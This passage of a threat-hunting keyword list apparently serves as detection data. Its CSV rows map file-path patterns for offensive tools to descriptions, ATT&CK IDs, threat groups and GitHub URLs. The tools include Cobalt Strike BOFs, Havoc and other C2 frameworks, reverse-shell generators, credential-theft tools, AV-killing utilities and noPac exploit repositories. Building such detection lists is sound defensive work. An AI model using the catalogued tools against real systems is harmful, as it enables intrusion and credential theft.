Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/Remote/setuserpass/,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 
- T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/Remote/setuserpass/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/Remote/unexpireuser/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - 
T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/remote-method-guesser.git*,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,1,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*/RemoteOps.py*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*/remotereg.c*,offensive_tool_keyword,cobaltstrike,Collection of CobaltStrike beacon object files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 
- T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/pwn1sher/CS-BOFs,1,1,N/A,10,10,100,23,2022-02-14T09:47:30Z,2021-01-18T08:54:48Z -*/remotereg.o*,offensive_tool_keyword,cobaltstrike,Collection of CobaltStrike beacon object files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/pwn1sher/CS-BOFs,1,1,N/A,10,10,100,23,2022-02-14T09:47:30Z,2021-01-18T08:54:48Z -*/remoteshell.py*,offensive_tool_keyword,wmiexec2,wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.,T1047 - T1027 - T1059,TA0005 - TA0002,N/A,N/A,Lateral Movement,https://github.com/ice-wzl/wmiexec2,1,1,N/A,9,1,10,1,2023-05-14T19:44:26Z,2023-02-07T22:10:08Z -*/resolveall.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/resources/PROCEXP.sys*,offensive_tool_keyword,Backstab,A tool to kill antimalware protected processes,T1107 - T1106 - T1543.004 ,TA0002 - TA0004 ,N/A,N/A,Defense Evasion,https://github.com/Yaxser/Backstab,1,1,N/A,N/A,10,1237,216,2021-06-19T20:01:52Z,2021-06-15T16:02:11Z -*/resources/selfdestruction*,offensive_tool_keyword,deimosc2,DeimosC2 is a Golang command and control framework for post-exploitation.,T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007,TA0011,N/A,N/A,C2,https://github.com/DeimosC2/DeimosC2,1,1,N/A,10,10,1004,158,2023-07-15T05:34:10Z,2020-06-30T19:24:13Z -*/Responder.git*,offensive_tool_keyword,responder,LLMNR. NBT-NS and MDNS poisoner,T1557.001 - T1171 - T1547.011,TA0011 - TA0005 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/SpiderLabs/Responder,1,1,N/A,N/A,10,4198,1633,2020-06-15T18:07:44Z,2012-10-24T14:35:12Z -*/responder/Responder.conf *,offensive_tool_keyword,responder,LLMNR. 
NBT-NS and MDNS poisoner,T1557.001 - T1171 - T1547.011,TA0011 - TA0005 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/SpiderLabs/Responder,1,1,N/A,N/A,10,4198,1633,2020-06-15T18:07:44Z,2012-10-24T14:35:12Z -*/Responder/Responder.conf*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/Responder/Responder.conf*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*/Responder-master.zip*,offensive_tool_keyword,responder,LLMNR. NBT-NS and MDNS poisoner,T1557.001 - T1171 - T1547.011,TA0011 - TA0005 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/SpiderLabs/Responder,1,1,N/A,N/A,10,4198,1633,2020-06-15T18:07:44Z,2012-10-24T14:35:12Z -*/returnvar/wce/*,offensive_tool_keyword,wce,Windows Credentials Editor,T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001,TA0006 - TA0005 - TA0002,N/A,N/A,Credential Access,https://www.kali.org/tools/wce/,1,1,N/A,8,4,N/A,N/A,N/A,N/A -*/rev_shell.py*,offensive_tool_keyword,C2_Server,C2 server to connect to a victim machine via reverse shell,T1090 - T1090.001 - T1071 - T1071.001,TA0011 ,N/A,N/A,C2,https://github.com/reveng007/C2_Server,1,1,N/A,10,10,31,17,2022-02-27T02:00:02Z,2021-03-05T12:35:45Z -*/reverse-index.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/reverse-shell-generator*,offensive_tool_keyword,reverse-shell-generator,Hosted Reverse Shell generator with a ton of functionality,T1059 T1071,N/A,N/A,N/A,POST Exploitation tools,https://github.com/0dayCTF/reverse-shell-generator,1,1,N/A,N/A,10,2271,510,2023-08-12T15:06:21Z,2021-02-27T00:53:13Z -*/rexec-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/rfc868-time.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/RGPerson.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*/riak-http-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ricardojba/Invoke-noPac*,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0003 - TA0008 - TA0002,N/A,N/A,Exploitation tools,https://github.com/ricardojba/Invoke-noPac,1,1,N/A,N/A,1,57,12,2023-02-16T10:45:19Z,2021-12-13T19:01:18Z -*/ricardojba/noPac*,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0003 - TA0008 - TA0002,N/A,N/A,Exploitation tools,https://github.com/ricardojba/noPac,1,1,N/A,N/A,1,34,5,2021-12-19T17:42:12Z,2021-12-13T18:51:31Z -*/rid_hijack.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/ridenum/ridenum.py*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*/Ridter/noPac*,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0003 - TA0008 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Ridter/noPac,1,1,N/A,N/A,7,643,112,2023-01-29T03:31:27Z,2021-12-13T10:28:12Z -*/rlogin-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/rmi-dumpregistry.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/rmi-vuln-classloader.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ROADtools/*,offensive_tool_keyword,ROADtools,A collection of Azure AD tools for offensive and defensive security purposes,T1136.003 - T1078.004 - T1021.006 - T1003.003,TA0002 - TA0004 - TA0005 - TA0006,N/A,N/A,Network Exploitation tools,https://github.com/dirkjanm/ROADtools,1,1,N/A,N/A,10,1353,206,2023-09-27T08:30:55Z,2020-03-28T09:56:08Z -*/rockyou.txt*,offensive_tool_keyword,AD exploitation cheat sheet,Crack the hash with Hashcat,T1110,TA0006,N/A,N/A,Credential Access,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/rockyou.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*/rockyou.txt*,offensive_tool_keyword,wordlists,package contains the rockyou.txt wordlist,T1110.001,TA0006,N/A,N/A,Credential Access,https://www.kali.org/tools/wordlists/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/RoguePotato.git*,offensive_tool_keyword,RoguePotato,Windows Local Privilege Escalation from Service Account to System,T1055.002 - T1078.003 - T1070.004,TA0005 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/antonioCoco/RoguePotato,1,1,N/A,10,9,876,125,2021-01-09T20:43:07Z,2020-05-10T17:38:28Z -*/RogueWinRMdll*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. 
vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/RogueWinRMexe*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/root/.mozilla/firefox/*.Exegol*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/root/output/ratchatPT*,offensive_tool_keyword,ratchatpt,C2 using openAI API,T1094 - T1071.001,TA0011 - TA0002,N/A,N/A,C2,https://github.com/spartan-conseil/ratchatpt,1,0,risk of False positive,10,10,4,2,2023-06-09T12:39:00Z,2023-06-09T09:19:10Z -*/root/shellcode.c*,offensive_tool_keyword,FourEye,AV Evasion Tool,T1059 - T1059.001 - T1059.005 - T1027 - T1027.005,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/lengjibo/FourEye,1,0,N/A,10,8,724,154,2021-12-08T11:55:15Z,2020-12-11T01:29:58Z -*/root/shellcode.cpp*,offensive_tool_keyword,FourEye,AV Evasion Tool,T1059 - T1059.001 - T1059.005 - T1027 - T1027.005,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/lengjibo/FourEye,1,0,N/A,10,8,724,154,2021-12-08T11:55:15Z,2020-12-11T01:29:58Z -*/root/shellcode.exe*,offensive_tool_keyword,FourEye,AV Evasion Tool,T1059 - T1059.001 - T1059.005 - T1027 - T1027.005,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/lengjibo/FourEye,1,0,N/A,10,8,724,154,2021-12-08T11:55:15Z,2020-12-11T01:29:58Z -*/root/viper/*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes 
the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*/root/viper/dist*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,0,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*/rop_emporium*,offensive_tool_keyword,Exrop,Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints,T1554,TA0003,N/A,N/A,Exploitation tools,https://github.com/d4em0n/exrop,1,1,N/A,N/A,3,265,26,2020-02-21T08:01:06Z,2020-01-19T05:09:00Z -*/ropbuffers.go*,offensive_tool_keyword,ruler,A tool to abuse Exchange services,T1102.001 - T1201.001 - T1570.002,TA0006,N/A,N/A,Exploitation tools,https://github.com/sensepost/ruler,1,1,N/A,N/A,10,1991,353,2021-02-19T09:28:07Z,2016-08-18T15:05:13Z -*/ropfuscator*,offensive_tool_keyword,ropfuscator,ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).,T1090 - T1027 - T1055 - T1099 - T1140,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/ropfuscator/ropfuscator,1,1,N/A,N/A,4,375,30,2023-08-11T00:41:55Z,2021-11-16T18:13:57Z -*/rottenpotato*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. 
vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/rpcap-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/rpcap-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/rpcbomb.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/rpc-grind.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/rpcinfo.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/rpcrt.py *,offensive_tool_keyword,POC,Remote Code Execution Exploit in the RPC Library CVE-2022-26809,T1190 - T1203 - T1068 - T1210,TA0001 - TA0002 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/yuanLink/CVE-2022-26809,1,0,N/A,N/A,1,62,26,2022-05-25T00:57:52Z,2022-05-01T13:19:10Z -*/rpivot.git*,offensive_tool_keyword,rpivot,socks4 reverse proxy for penetration testing,T1090.004 - T1572 - T1021.001,TA0011 - TA0002 - TA0040,N/A,N/A,C2,https://github.com/klsecservices/rpivot,1,1,N/A,10,10,490,125,2018-07-12T09:53:13Z,2016-09-07T17:25:57Z -*/rsa-vuln-roca.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - 